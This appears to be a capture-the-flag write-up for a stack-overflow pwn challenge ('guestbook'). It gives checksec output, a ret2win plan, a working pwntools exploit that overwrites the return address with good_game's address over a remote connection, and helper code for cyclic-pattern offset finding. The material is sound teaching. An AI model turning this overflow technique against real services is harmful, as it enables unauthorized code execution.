Challenge info

Do you have something to tell me?

nc pwn.jarvisoj.com 9876

guestbook.d3d5869bd6fb04dd35b29c67426c0f05

checksec

Only NX is enabled (no canary, no PIE, no RELRO):
$ checksec --file guestbook
[*] '/Users/miao//CTF/PWN/guestbook/guestbook'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)

Static analysis

Decompile with IDA (F5). The stack overflow is obvious, and the binary also contains a good_game function.

good_game reads the flag.

So the plan is clear: overflow the buffer, overwrite the saved return address with the address of good_game, and the flag is read for us. NX only stops us executing shellcode on the stack; returning into code that already exists in the binary is unaffected, and with no PIE the address of good_game is fixed.

exploit

Confirm the offset to the saved return address and the address of good_game in gdb. With no canary there is nothing between the buffer and the saved rip that has to be preserved, and with no PIE the symbol address from the ELF is the runtime address. If jumping straight into a function faults on an SSE instruction such as movaps, the stack is misaligned after the ret; in that case put a single ret gadget in front of the function address.

Build the exploit:

from pwn import *

elf = ELF('./guestbook')

sh = remote('pwn.jarvisoj.com', 9876)
# sh = process('./guestbook')   # local test
context.arch = 'amd64'
context.log_level = 'debug'
# No PIE: the symbol address in the ELF is the address at runtime
good_game_addr = elf.symbols["good_game"]

# 0x88 bytes of padding reach the saved return address (offset confirmed in gdb);
# use a bytes literal so the concatenation with p64() also works on Python 3
payload = b'A' * 0x88
payload += p64(good_game_addr)    # return into good_game
sh.sendline(payload)
sh.recvline()
sh.interactive()
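The offset-finding step that the writeup does in gdb, as an added example (not the original author's code and not part of the challenge): a pwntools-style cyclic pattern and offset search written with only the standard library so it runs offline. The frame layout assumed in simulate_crash (a 0x80-byte buffer, then the saved rbp, then the saved rip, which gives the 0x88 offset used above) and the address 0x4006f0 are assumptions made only to exercise the helpers; the real good_game address comes from elf.symbols as in the exploit.

```python
import struct

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"

# Placeholder only: NOT the real address of good_game in the challenge binary.
GOOD_GAME_ADDR_EXAMPLE = 0x4006f0


def cyclic(length, n=4, alphabet=ALPHABET):
    """De Bruijn sequence of `length` bytes in which every n-byte window is
    unique (the same idea as pwntools' cyclic()). Sent into the overflow, the
    bytes that land in the saved return address reveal their own offset."""
    k = len(alphabet)
    a = [0] * (k * n)
    seq = []

    def db(t, p):
        if len(seq) >= length:          # stop as soon as we have enough bytes
            return
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    if length > len(seq):
        raise ValueError("pattern longer than k**n; increase n")
    return bytes(alphabet[i] for i in seq[:length])


def find_offset(pattern, crash_value, n=4):
    """Offset in the pattern of the bytes that reached RIP (or RSP/RBP) when the
    program crashed. crash_value is the 64-bit register value gdb shows; only
    its low n bytes are needed because every n-byte window of the pattern is unique."""
    window = struct.pack("<Q", crash_value)[:n]
    off = pattern.find(window)
    if off < 0:
        raise ValueError("register value is not from the pattern")
    return off


def build_payload(offset, target_addr):
    """Padding up to the saved return address, then the 64-bit target address."""
    payload = b"A" * offset + struct.pack("<Q", target_addr)
    # The program reads one line, so a 0x0a byte inside the address would
    # truncate the payload before the address is fully written.
    if b"\n" in payload:
        raise ValueError("payload contains a newline; line-based input would truncate it")
    return payload


def simulate_crash(pattern, buf_size=0x80):
    """Constructed stand-in for the gdb step (assumption: buf_size-byte buffer,
    8-byte saved rbp, then the saved rip). Returns the value `ret` would pop
    into RIP after the pattern overflowed the frame."""
    rip_off = buf_size + 8
    return struct.unpack("<Q", pattern[rip_off:rip_off + 8])[0]


if __name__ == "__main__":
    pat = cyclic(0x100)
    rip = simulate_crash(pat)
    off = find_offset(pat, rip)
    print("RIP at crash: %#x -> offset %#x" % (rip, off))
    print(build_payload(off, GOOD_GAME_ADDR_EXAMPLE).hex())
```

Against the real binary the flow is the same: send cyclic(0x100) to the program under gdb, read the faulting register value, pass it to find_offset, and use that offset with the address from elf.symbols["good_game"].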

getflag